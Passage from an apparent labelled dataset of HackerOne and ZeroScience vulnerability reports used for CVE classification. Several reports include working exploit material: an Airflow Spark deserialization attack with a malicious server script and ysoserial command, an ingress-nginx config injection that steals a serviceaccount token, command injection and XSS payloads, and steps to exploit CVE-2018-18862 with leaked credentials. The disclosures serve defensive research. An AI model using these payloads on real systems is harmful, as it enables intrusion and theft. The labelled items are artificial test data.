y-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter\n\n███ \n\n## References\n\nhttps://hackerone.com/reports/925425\nhttps://hackerone.com/reports/335177\n\n## References\n\n## Impact\n\nAttackers can use this vulnerable function to deplete server resources and launch denial of service attacks.\n\n## System Host(s)\n███\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nAccess:\n```\nhttps://████████/wp-admin/load-scripts.php?load=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scripta", "source": "hackerone", "timestamp": "2023-02-24", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "024ee216ec85fff74232", "text": "[Deserialization of Untrusted Data] [CVE-2023-27531] Possible Deserialization of Untrusted Data vulnerability in Kredis JSON\n\nI made a report and patch at https://hackerone.com/reports/1702859 .\n\nhttps://discuss.rubyonrails.org/t/cve-2023-27531-possible-deserialization-of-untrusted-data-vulnerability-in-kredis-json/82467\n\n> There is a deserialization of untrusted data vulnerability in the Kredis JSON deserialization code. This vulnerability has been assigned the CVE identifier CVE-2023-27531.\n\n## Impact\n\n> Carefully crafted JSON data processed by Kredis may result in deserialization of untrusted data, potentially leading to deserialization of unexpected objects in the system.", "source": "hackerone", "timestamp": "2023-08-15", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "75beb9b7434366dcb8af", "text": "[Deserialization of Untrusted Data] CVE-2023-40195: Apache Airflow Spark Provider Deserialization Vulnerability RCE\n\nApache Airflow Spark Provider. After the malicious Spark server address is configured through the connections of the Airflow UI interface, attackers exploit malicious servers to manipulate pyspark clients through malicious deserialization data. So as to implement RCE attack on airflow server.\n\n##Vulnerability principle:\n\n1. Analyze spark principle: Spark protocol is based on RPC communication. The RPC communication process is a serialization and deserialization process, Therefore, attackers can call arbitrary java methods through deserialization, implement RCE.\n\n2.Spark can attack the server through malicious client deserialization, and can also attack the client through malicious server; In the Airflow scenario, PySpark is used as a client to connect to the Spark Server through Spark Provider. So, an attacker only needs to construct a malicious server to attack Airflow's Spark client.\n\nThe command that triggers deserialization is as follows:\n**spark-submit --master spark://evil_ip:port**\nTherefore, an attacker can configure malicious ip and port through the connections of the Airflow UI. And to execute the above command, then trigger the deserialization operation.\n\n##Vulnerability exploitation process:\n\n1. Create a new ‘Spark’ connection is named ‘spark_default’,and configure the Port and Host parameter.\nHost: spark://172.31.76.174\nPort: 8888\n\n###172.31.76.174 is malicious spark server address for attackers\n\n\n(F2648714)\n\n{F2648715}\n\n2.Attackers generate malicious deserialized data (exp.der) through the deserialization tool ysoserial. \n**Tool URL: https://github.com/frohoff/ysoserial**\nThe attacker locally executes the following commands:\n**\"C:\\Program Files\\Java\\jre1.8.0_361\\bin\\java\" -jar ysoserial.jar CommonsCollections4 \"touch /tmp/thisisRCE\" > exp.der**\n#touch /tmp/thisisRCE is malicious commands to be executed on airflow.\n\n{F2648716}\n\n3.The attacker starts the malicious Spark server locally and specifies the malicious deserialized data to be transmitted.\n**python2 evil_spark_server.py 8888 exp.der**\n\n{F2648717}\n\n4. Enter the DAGs menu and start hive_dag task, select “Trigger DAG w/ config”. \nhttp://localhost:8080/trigger?dag_id=example_spark_operator\n\n{F2648718}\n\n4. The final command is as follows:\n\n**spark-submit --master spark://172.31.76.174:8888 --name arrow-spark /tmp/file**\nThrough the log and server view, it can be seen that any command has been executed successfully.\n\n{F2648719}\n\nThe malicious server successfully accepted the request and sent malicious data.\n\n{F2648720}\n\nSuccessfully executed malicious commands on Airflow Worker Server.\n\n{F2648722}\n\n**evil_spark_server.py**\n```\n#!/usr/bin/python\nimport socket\nimport os\nimport sys\nimport struct\n\nfrom SocketServer import BaseRequestHandler, ThreadingTCPServer\n\nclass EchoHandler(BaseRequestHandler):\n def handle(self):\n print 'Got connection from %s'%(str(self.client_address))\n while True:\n msg = self.request.recv(8192)\n print msg\n if not msg:\n break\n if len(msg) > 16:\n print \"Send msg>>>\"\n self.request.send(build_msg(msg[9:17]))\n\ndef build_msg(request_id):\n payloadObj = open(sys.argv[2],'rb').read()\n msg_type = '\\x04'\n head_length = 21\n msg = struct.pack('>Q',len(payloadObj) + 21) + msg_type + request_id\n msg += struct.pack('>I',len(payloadObj)) + payloadObj\n return msg\nif __name__ == '__main__':\n if len(sys.argv) < 3:\n print 'Usage: python %s ' % os.path.basename(sys.argv[0])\n sys.exit()\n serv = ThreadingTCPServer(('0.0.0.0', int(sys.argv[1])), EchoHandler)\n print \"Server listening on 0.0.0.0:%s\"%(sys.argv[1])\n serv.serve_forever()\n```\n\n**DAG Demo(example_spark.py):**\n```\nfrom datetime import datetime\n\nfrom airflow.models import DAG\nfrom airflow.providers.apache.spark.operators.spark_jdbc import SparkJDBCOperator\nfrom airflow.providers.apache.spark.operators.spark_sql impo", "source": "hackerone", "timestamp": "2023-09-08", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "a8f49fa1994a9fadcaae", "text": "[Business Logic Errors] [app.lemlist.com] Improper handling of payment lead to bypass payment\n\n## Summary:\nHello Team,\nI truly hope it treats you awesomely on your side of the screen :)\n\ndue to improper handling of payment methods, an attacker can easily bypass the payment and benefit from a paid plan.\n\n## Steps To Reproduce:\n\n1. Log to your account\n1. Go to the billing page\n1. Fill in the address tab\n1. Go to the next tab `Payment Card` \n1. ==Now the interesting step Make sure you don't have any money on your credit card==\n1. Chose `Email outreach` and wait until you get a notification that the payment is failed\n1. Next increase the number of seats for example 50 \n1. Again you will get a notification that the payment is failed\n1. Now Cancel the subscription\n1. Now I can use the paid features without paying anything.\n\n# POC\n{{F1538593}}\n\n## Impact\n\nI think the impact is pretty obvious, an attacker can use paid plans without paying anything.\n\nif you need more info feel free to ping me \n\nbest Regards\n@omarelfarsaoui", "source": "hackerone", "timestamp": "2022-05-17", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "d87c3a70cdc5d555a29d", "text": "Ateme TITAN File 3.9 Job Callbacks SSRF File Enumeration\n\nSeverity: medium", "source": "zeroscience", "timestamp": "2023-07-07", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "1896b557509baef57641", "text": "[Information Disclosure] Django debug enabled showing information about system, database, configuration files\n\n## Summary:\nHi team,\nThis subdomain `pulpo.it.glovoint.com` is a Django application running with debug mode turned on (DEBUG = True ).\nOne of the main features of debug mode is the display of detailed error pages to help developers.\nIf your app raises an exception when DEBUG is True, Django will display a detailed traceback, including a lot of metadata about your environment, such as all the currently defined Django settings.py file.\n\n## Steps To Reproduce:\nit's not complicated and needs some user interaction, using Burpsuite I send the POST request to `https://pulpo.it.glovoint.com/admin` path and I got 500 response. \n\nThe information leaked includes the following:\nDjango Version.\npython Version\nIP addresses\nS3_URL\ndatabase (username, URL, type, port )\nemail addresses\n\n\n## Supporting Material/References:\n███\n\n## Remediation:\nNever deploy with DEBUG turned on.\nTo disable debug mode, set DEBUG=False in your Django settings.py file.\n\n## Impact\n\nAn attacker can obtain information such as:\nDjango & Python version.\nUsed database type, database user name, and current database name.\nDetails of the Django project configuration.\nInternal file paths.\nException-generated source code, local variables and their values.\nThis information might help an attacker gain more information and potentially to focus on the development of further attacks on the target system.", "source": "hackerone", "timestamp": "2022-05-31", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "f31568e89ddde0a4fa33", "text": "[Cross-site Scripting (XSS) - Stored] XSS exploit of RDoc documentation generated by rdoc\n\nWhen creating an RDoc html documentation, there is a possibility to inject malicious code through file name.\n\n# PoC\n\n```bash\n~ $ touch \\\"\\>\\Controlling\\ what\\ is\\ documented\\ here\n~ $ ls\n\">Controlling what is documented here\n~ $ rdoc --all\n```\n\nNow, the generated index file has injected javascript code:\n\n```html\n...\n
  • Controlling what is documented here.html\">"><object src=1 onerror="javascript:alert(1);">Controlling what is documented here\n...\n```\n\nI set to the vulnerability the same severity as CVE-2013-0256 has, since rdoc is widely used on dev/production systems online documentation, etc. An attacker can hide a bad-named-file deep in the project structure to be stealthy. Also, the file can be very tricky-named in documentation list, can contain the real documentation code, and so as not to arouse suspicion for some time.\n\n## Impact\n\nThe injected code can exfiltrate data or install malware on the (user|developer)’s machine, etc.", "source": "hackerone", "timestamp": "2023-07-18", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "104db6c580545893cf44", "text": "[Server-Side Request Forgery (SSRF)] Blind SSRF in FogBugz project import\n\n### Steps to reproduce\n\n1. Run GitLab `docker run --detach --hostname gitlab.example.com --publish 443:443 --publish 80:80 --publish 22:22 --name gitlab gitlab/gitlab-ce:latest`\n2. Connect to the GitLab Docker container: `docker exec -it gitlab /bin/bash`\n3. Install netcat: `apt update && apt install -y netcat`\n4. Run server in container: `nc -llvp 12345`\n5. Use http://localhost:12345 as FogBugz URL (see screenshot) \n{F602736}\n\n#### Results of GitLab environment info\n\n```\nroot@gitlab:/# gitlab-rake gitlab:env:info\n\nSystem information\nSystem: \nCurrent User: git\nUsing RVM: no\nRuby Version: 2.6.3p62\nGem Version: 2.7.9\nBundler Version:1.17.3\nRake Version: 12.3.2\nRedis Version: 3.2.12\nGit Version: 2.22.0\nSidekiq Version:5.2.7\nGo Version: unknown\n\nGitLab information\nVersion: 12.3.5\nRevision: 2417d5becc7\nDirectory: /opt/gitlab/embedded/service/gitlab-rails\nDB Adapter: PostgreSQL\nDB Version: 10.9\nURL: http://gitlab.example.com\nHTTP Clone URL: http://gitlab.example.com/some-group/some-project.git\nSSH Clone URL: git@gitlab.example.com:some-group/some-project.git\nUsing LDAP: no\nUsing Omniauth: yes\nOmniauth Providers: \n\nGitLab Shell\nVersion: 10.0.0\nRepository storage paths:\n- default: /var/opt/gitlab/git-data/repositories\nGitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell\nGit: /opt/gitlab/embedded/bin/git\n```\n\n## Impact\n\nThe vulnerability allows an attacker to make arbitrary requests inside a GitLab instance's network.", "source": "hackerone", "timestamp": "2023-05-30", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "9beae918550009191a4e", "text": "SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Directory Traversal File Write Exploit\n\nSeverity: critical", "source": "zeroscience", "timestamp": "2022-12-14", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "eb923f0267cc496557b9", "text": "[Information Disclosure] Insecure crossdomain.xml on https://vdc.mtnonline.com/\n\nHi,\n\nhttps://vdc.mtnonline.com/crossdomain.xml contains the following xml file:\n\n```\n\n\n\n\t \n\t \n\t\n\t \n\t\n\n```\n\n## Impact\n\nThis will make any one able to receive content from https://vdc.mtnonline.com/ , attacker can steal CSRF tokens and user PII.\n\nMore information about this issue is available here:\n\nhttps://medium.com/@x41x41x41/exploiting-crossdomain-xml-missconfigurations-3c8d407d05a8\n\nBest regards,\nVishu10x00 ❤️", "source": "hackerone", "timestamp": "2022-03-20", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "3a18167524e604c382db", "text": "[Improper Authentication - Generic] PIN 📌 BYPASS 🥷\n\nSummary:\n\n 983980808 IOS App has improper rate limit.\n\nWhen we try to brute force the PIN, we are rate limited for 5 minutes after 5 or 6 attempt.\n\nIn my testing I found that it was checking the device's local date / time so by changing it we can brute force the PIN.\n\nSteps To Reproduce:\n\n1.Install 983980808 IOS APP from IOS APP store.\n2.Create your PIN.\n3.Now open again your 983980808 IOS App\n4.You will be asked to enter the PIN.\n5.Try to brute force the code. You will see a message to try again after 5 min.\n6.Now change the date / time of your device.\n7.Observe there is no rate limit now.\n\nPOC video : IMG_7755.MP4\n\n## Impact\n\nAn attacker can brute force the PIN of an user", "source": "hackerone", "timestamp": "2022-03-18", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "184b3b881a74c9628d1f", "text": "[Unknown] Clickjacking\n\n##Summary\n\nClickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages.\n\nWebsites are at risk of a clickjacking attack when they allow content to be embedded within a frame.\n\nAn attacker may use this risk to invisibly load the target website into their own site and trick users into clicking on links which they never intended to. An \"X-Frame-Options\" header should be sent by the server to either deny framing of content, only allow it from the same origin or allow it from a trusted URIs.\n\n\n##Proof of concept code :- \n\nCopy the above code and paste it in notepad and save it with .html extention\nand open it in browser\n\n```\n \n \nClickjack test page \n \n \n

    Website is vulnerable to clickjacking!

    \n\n \n\n \n\n```\n\nCopy and paste above given code and save it with hack.html and open it in browser\n\n\n\n\n##Recommendation :- \n\nAdd X-FRAME-OPTIONS header to mitigate the issue\n\n## Impact\n\nIt allows remote attackers to do some clickjacking which can be used for adding arbitrary tasks . Why? Almost all of your page has missing X-FRAME-OPTIONS header.\n\n\n##Thanks", "source": "hackerone", "timestamp": "2022-01-17", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "420017f965511c57c32d", "text": "[Server-Side Request Forgery (SSRF)] Blind SSRF External Interaction on ████████\n\nHii Security Team,\n\nI am S █████(Metaxone Certified Ethical Hacker) and a Security Researcher I just checked your website and found Blind SSRF External Interaction on ██████████\n\nWhat is SSRF?\nServer-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing.\nIn typical SSRF examples, the attacker might cause the server to make a connection back to itself, or to other web-based services within the organization's infrastructure, or to external third-party systems.\nSSRF attacks often exploit trust relationships to escalate an attack from the vulnerable application and perform unauthorized actions. These trust relationships might exist in relation to the server itself, or in relation to other back-end systems within the same organization.\n\nSteps to reproduce:-\n\n1.Navigate to the website █████\n2.Now you can see at bottom on the right there is chat box or messanger box.\n3.Click on it and paste the Burp Collaborator URL { Example : In this scenario the URL belike ██████ } and click on send\n4.Now we will get HTTP and DNS interaction in Burp Collab and In HTTP requesting it is fetching the file ( test.png ) it means it is vulnerable to Blind SSRF\n\nReferences:- Similar report which is reported by another researcher ███████\n\n## Impact\n\nImpact:--\nThis Vulnerability can lead to Attack Surface Analysis is about mapping out what parts of a system need to be reviewed and tested for security vulnerabilities.\nThe attacker can fetch malicious files which can infect the server\nThis will allow attackers to gain access to an internal IP of a website along with other sensitive information that may be leaked with the request\n\nPOC Attached Below :-", "source": "hackerone", "timestamp": "2022-08-21", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "89188dfe7452394d027f", "text": "[Time-of-check Time-of-use (TOCTOU) Race Condition] Promotion code can be used more than redemption limit.\n\n## Summary:\nWhile creating a promotion code a user can specify number of times that code can be redeemed.(i.e. Redemption limit)\n{F1962666}\nCodes aren't supposed to be redeemed more than the redemption limit.\nBut there exists a race condition that allows use of promotion codes more than redemption limit.\n{F1962665}\n\n## Steps To Reproduce:\n[In these steps i have used just a browser to show how easy this is to exploit and even a person with very limited knowledge on technology can exploit this. This can certainly be scaled using burp and other software .]\n\n1. As a merchant create a promotion code with Redemption limit 1.\n{F1962664}\n2. As a user, Visit any two payment links of same merchant with the coupon.\n3. In both payment links, Fill the form and apply coupon but don't hit Pay/ Subscribe.\n4.Hit both link's pay/subscribe button as fast as you can.\n5. Both payment will be successful using one coupon two times.\n\n## Supporting Material/References:\nI have added a video poc.\nIn this poc, I have used a promotion code with redemption limit 2.\nI have also used laptops screentouch feature to click both link's pay/subscribe button as fast as I could.\n{F1962525}\n\n## Impact\n\nPromotion code can be used more than redemption limit.", "source": "hackerone", "timestamp": "2023-02-13", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "8583d4ed7b70bafb9ce0", "text": "[Privilege Escalation] Ingress-nginx path allows retrieval of ingress-nginx serviceaccount token\n\nReport Submission Form\n\n## Summary:\nA user with the permissions to create an ingress resource can obtain the ingress-nginx service account token which can list secrets is all namespaces (cluster wide).\n\n## Kubernetes Version:\n1.20 (should work on (1.21 as well)\n\n## Component Version:\nnginx ingress controller v1.0.4\n\n## Steps To Reproduce:\nI deployed the latest ingress-controller (v1.0.4).\nI used a user (gaf_test) that has the permissions to get, create and update ingress resources\n(the “get” permissions is only to allow kubectl to view the newly created resource).\n\ningress-creator-role.yaml\n```yaml\napiVersion: rbac.authorization.k8s.io/v1\nkind: Role\nmetadata:\n name: ingress-creator\n namespace: default\nrules:\n- apiGroups: [\"networking.k8s.io\"]\n resources: [\"ingresses\"]\n verbs: [\"get\", \"create\", \"update\"]\n```\n\ningress-creator-role-binding.yaml\n```yaml\napiVersion: rbac.authorization.k8s.io/v1\nkind: RoleBinding\nmetadata:\n name: gaf_test-ingress-creator-binding\n namespace: default\nsubjects:\n- kind: User\n name: gaf_test\n apiGroup: rbac.authorization.k8s.io\nroleRef:\n kind: Role\n name: ingress-creator\n apiGroup: rbac.authorization.k8s.io\n```\n\nThis user (gaf_user) cannot list secrets at all.\n{F1495367}\n \nUse this user (gaf_user) to create a new ingress resource in the default namespace.\n\ningress.yaml\n```yaml\napiVersion: networking.k8s.io/v1\nkind: Ingress\nmetadata:\n name: gaf-ingress\n annotations:\n kubernetes.io/ingress.class: \"nginx\"\nspec:\n rules:\n - http:\n paths:\n - path: /gaf{alias /var/run/secrets/kubernetes.io/serviceaccount/;}location ~* ^/aaa\n pathType: Prefix\n backend:\n service:\n name: some-service\n port:\n number: 5678\n```\n```\nkubectl apply -f ingress.yaml\n```\n{F1495369}\n \n\nAccess to nginx ingress loadbalancer to /gaf/token path.\n\nhttps:///gaf/token\n\n {F1495370}\n\nDecode the token to see it belongs to the ingress-nginx\n{F1495372}\n \nThe nginx-ingress service account is bound to the nginx-ingress cluser role that can list secrets in all namespaces.\n\n## The Root Cause\nWhen a user creates an ingress resource, the new configuration is updated in the /etc/nginx/nginx.conf file in the ingress-nginx-controller pod located in the nginx-ingress namespace.\nI caused a “config file injection” using the following payload as path:\n\n**/gaf{alias /var/run/secrets/kubernetes.io/serviceaccount/;}location ~* ^/aaa**\nThe payload above creates the following configuration for nginx:\n\n/etc/nginx/nginx.conf\n\n{F1495371} \n\nThis is the relevant part from the configuration which creates a new route to /gaf path and uses an alias (http://nginx.org/en/docs/http/ngx_http_core_module.html#alias)\nthat maps to /var/run/secrets/kubernetes.io/serviceaccount/ directory on the ingress-nginx-controller pod.\n\n## Impact\n\nA user with the permissions to create an ingress resource can obtain the ingress-nginx service account token which can list secrets is all namespaces (cluster wide).", "source": "hackerone", "timestamp": "2022-08-06", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "64ad8a084d1e09a93a78", "text": "[Violation of Secure Design Principles] [U.S. Air Force] Information disclosure due unauthenticated access to APIs and system browser functions\n\n**Description:**\nMultiple information exposure vulnerabilites were identified in a Jira Server instance (unauthenticated access to APIs and system browser functions). This report describes a combination of two separate vulnerabilities in two separate services This chain of vulnerabilities allows unauthenticated attacker to run arbitrary code on a server inside the company's internal network. the vulnerable registered as references [JRASERVER-73060](https://jira.atlassian.com/browse/JRASERVER-73060)\n\n## References\nhttps://jira.atlassian.com/browse/JRASERVER-73060\nhttps://nvd.nist.gov/vuln/detail/CVE-2020-14179\n\n## Impact\n\nUnauthorised access and the data should not be visible.\nProject categories, resolutions, and usernames are listed even if the API is not authenticated\n\n## System Host(s)\n███\n\n## Affected Product(s) and Version(s)\nhttps://██████/rest/menu/latest/admin\n\n## CVE Numbers\nCVE-2020-14179\n\n## Steps to Reproduce\n1. Navigate visit the target scope is https://████//rest/menu/latest/admin\n 1. And now we found a directory is jira sensitive\n 1. You can used recon-tool for finding sensitive directory\n 1. Lets send a curl request to the **`?maxResults=1000`** endpoint, as shown below. In the request, point the post request to the server address you want to send the request to:\n\nHere's the HTTP Parameter request that the issue:\n```\nGET /rest/api/2/projectCategory?maxResults=1000 HTTP/1.1\nHost: ████████\nConnection: keep-alive\nPragma: no-cache\nCache-Control: no-cache\nsec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"96\", \"Google Chrome\";v=\"96\"\nAccept: application/json, text/plain, */*\nsec-ch-ua-mobile: ?0\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\nsec-ch-ua-platform: \"Mac OS\"\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nAccept-Language: en-US,en;q=0.9,fi;q=0.8\n```\n```js\n{\n \"self\":\"https://█████/rest/api/2/projectCategory/10000\",\n \"id\":\"10000\",\n \"description\":\"Used by the broader DoD/IC for collaborative development.\",\n \"name\":\"Community Collaboration\"\n }\n][\n {\n \"key\":\"admin\",\n \"link\":\"https://█████████/secure/project/BrowseProjects.jspa?s=view_projects\",\n \"label\":\"Jira administration\",\n \"tooltip\":\"\",\n \"local\":true,\n \"self\":true,\n \"applicationType\":\"jira\"\n },\n {\n \"key\":\"admin\",\n \"link\":\"https://████████/admin/console.action\",\n \"label\":\"Confluence administration\",\n \"tooltip\":\"\",\n \"local\":false,\n \"self\":false,\n \"applicationType\":\"confluence\"\n }\n```\n * https://█████/rest/menu/latest/admin?maxResults=1000\n * https://██████/rest/api/2/projectCategory?maxResults=1000\n * https://███/rest/api/2/resolution?maxResults=1000\n\n## Suggested Mitigation/Remediation Actions\nAnonymous access to endpoints listed below is restricted starting Jira 9.0. On future Jira 8.x releases and all LTS releases it is possible to restrict anonymous access with feature flags. On Jira 8.x to restrict anonymous access to the endpoint you need to disable feature flag aka provide ``.disabled On Jira 9.0 you need to enable the same feature flag aka provide ``.enabled\n\n>\nYou can use given feature flags: \n`/rest/api/2/projectCategory` - (Anonymous access disabled completely) \n`/rest/api/2/resolution` - (Anonymous access blocked only when there is no projects available for anonymous users) \n`/rest/menu/latest/admin` - There is currently no feature flag to disable anonymous access, please check linked ticket in \"duplicates by\" to track this problem.", "source": "hackerone", "timestamp": "2023-01-27", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "9166cf28a4b49e78be2c", "text": "[Improper Certificate Validation] CVE-2023-28321: IDN wildcard match\n\nOriginal Report:https://hackerone.com/reports/1950627\n\n## Impact\n\nImproper Validation of Certificate with Host Mismatch.", "source": "hackerone", "timestamp": "2023-06-25", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "e3f8e2c201dad8887ef8", "text": "[Code Injection] CVE-2022-40127: RCE in Apache Airflow <2.4.0 bash example\n\nairflow-2.3.3/airflow/example_dags/example_bash_operator.py has a command injection vulnerability.\nI can control the run_id in the following code(example_bash_operator.py),So I can inject custom commands.\n```\n also_run_this = BashOperator(\n task_id='also_run_this',\n bash_command='echo \"run_id={{ run_id }} | dag_run={{ dag_run }}\"',\n )\n```\nEnter the DAGs menu and start example_bash_operator task, select “Trigger DAG w/ config”.Set the run_id to \" `touch /tmp/success` \" and trigger.\n\n{F2036322}\n\n## Impact\n\nExecute any OS command", "source": "hackerone", "timestamp": "2023-01-05", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "d5c89f9858502f8db30c", "text": "[Open Redirect] Open redirect by the parameter redirectUri in the URL\n\nThe following URL is vulnerable to an open redirect (it will redirect to google.com)\nhttps://www.blackrock.com/authplatform/user/activate-success?redirectUri=https://google.com\nAfter clicking on \"return to site\" it will be redirected to the page\n\n\nSteps To Reproduce:\n\n\nEnter on this link https://www.blackrock.com/authplatform/user/activate-success?redirectUri=https://google.com\nRedirected to https://google.com\n\n## Impact\n\nPhishing attacks to redirect users to malicious sites without realizing it", "source": "hackerone", "timestamp": "2022-04-21", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "999cf5b398c8fd999b1b", "text": "[Unknown] Arbitrary file read in Rocket.Chat-Desktop\n\n**Description:** Rocket.Chat-Desktop is vulnerable to arbitrary file read.\n\n## Releases Affected:\n\n * Rocket.Chat-Desktop-Client: < v3.0.0-develop\n\n## Steps To Reproduce (by setting up a malicious server):\n\n1. Go to `Administration » Layout » Custom Scripts » Custom Script for Logged In Users`\n1. Insert the following script `window.open('file://c:/windows/system32/drivers/etc/hosts').eval('alert(document.body.innerText);');`\n1. Click `Save changes`\n1. Open Rocket.Chat-Desktop and connect to the server\n1. A new window and an alert containing the contents of `c:/windows/system32/drivers/etc/hosts` will pop up.\n\n## Suggested mitigation\n\n * Set `popups` to `false` [[`src » component » electron » WebViewComponent.js (line 16)`](https://github.com/RocketChat/Rocket.Chat.Electron/blob/develop/src/components/electron/WebViewComponent.js)].\n\n## Impact\n\nArbitrary file read in Rocket.Chat-Desktop", "source": "hackerone", "timestamp": "2022-02-06", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "7eb1468b340859393e63", "text": "[Improper Access Control - Generic] Leaks of username and password leads to CVE-2018-18862 exploitation\n\nHi DoD Team, \nI hope you are doing good today.\n\nThis is a follow-up from my November 15th 2022 report number #1775217 (https://hackerone.com/reports/1775217)\nIn all respect and to be clear, I don't want to push too hard or be annoying on this and feel free to tell me if you don't want or need to take action on this.\n\nSince my report #1775217 was left un-answered I felt I should open a new one since I feel this is serious matter.\n\n>>Recap of my last report : \n>>On November 15th 2022: I opened a report describing how I've found a set of credential publicly exposed from an ITSM system indexed in search engines.\n>> On November 16th 2022 :I had a reply telling me that the credentials were valid but didn't have any rights on the system so there was no impact.\n>> On November 17th2022 : I had found another set of credentials exposed and I was able to successfully exploit CVE-2018-18862 from this.\n>>This was left un-answered.\n>>On February 12th 2023: The website was down and I left my report as such.\n>>See : https://hackerone.com/reports/1775217 for all the details.\n\n\nToday, to my surprise and while doing other searches I stumbled accross this website again.\nI would like to reiterate the following : \n\n\n>Today, May 16th 2023, the set of Credentials I had found at the time are still working :\n>>**Username:** ████\n>>**Password:** ███\n\n>>**Username:** ████████\n>>**Password:** ██████████\n\nSee screenshot 3, taken on May 16th 2023, the \"█████████\" credentials are still exposed.\n█████\n\nHere is the login page : https://████████/███████/shared/login.jsp\n \nToday, May 16th 2023, I can still successfully exploit **CVE-2018-18862 - Incorrect access control**.\n\nI decided to re-open the report for the following reasons : \n-I thought about it a long time, since on my prior report I didn't have any reply after the successful CVE exploitation and the new set of credentials found I judged it was worth having a 2nd look.\n-Also, I thought the system was down but today I found out it was not.\n\n\nIn all good faith.\nBest regards.\n\n\n~pll25\n\n\n## References\nhttps://nvd.nist.gov/vuln/detail/CVE-2018-18862\n\n## Impact\n\n-An attacker can access the system with the rights of these users.\n-I was able to list Roles. \n-I am potentially able to create/read reports and probably do more but I stopped there because the POC is already proven.\n-2 sets of credentials including valid username and passwords were leaked from this system on November 15th 2022.\n\n## System Host(s)\nhttps://███████\n\n## Affected Product(s) and Version(s)\nBMC Remedy version unknown\n\n## CVE Numbers\nCVE-2018-18862 - (CVSS V3.0 Score : 8.8 (HIGH), Vector: /AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).\n\n## Steps to Reproduce\n**Step 1:** \nLet's say we use the account \"██████████\". \nLogin with the username and password on this page : https://██████/███/shared/login.jsp \n(ScreenShot 1 from November 15th describes how I was able to obtain it).\n███\n\n**Step 2 :** \n You should land on an Error web page telling that the file doesn't exist.\nThe landing URL should look like this : \n>>███████/█████/forms/arpcp/**arpc:web:retirementsapplicationsubmission/default+administrator+view/$external%20report%20server%20url_glb$retirementapplication&rs:command=render&preportinstanceid=$536871212$&rs:format=pdf**\n\n**Step 3 :** \nHere we can exploit CVE-2018-18862 : replace all the text after : /forms/arpc/ (the part of the URL in bold above) with :\n>>/User/Default+Admin+View1/\n\n**Step 4:** \nYou will now have access to the whole Remedy ITSM system.\nFrom there you have successfully exploited CVE-2018-18862.\n\nI was able to list Roles. \nI am potentially able to create/read reports and probably do more but I stopped there because the POC is already proven.\n\n## Suggested Mitigation/Remediation Actions\n- Change affected passwords. \n- MIgrate the system to a new un-affected version.\n- Apply the vendor work-arounds if possible.", "source": "hackerone", "timestamp": "2023-06-02", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "4be7ddb3badea3303719", "text": "[Path Traversal] Path traversal in Nuget Package Registry\n\n### Summary\nThere's a path traversal issue in Nuget package registry which was released to GitLab-EE recently. The issue allows an attacker to create any file with an extension “.nupkg” in the filesystem. By 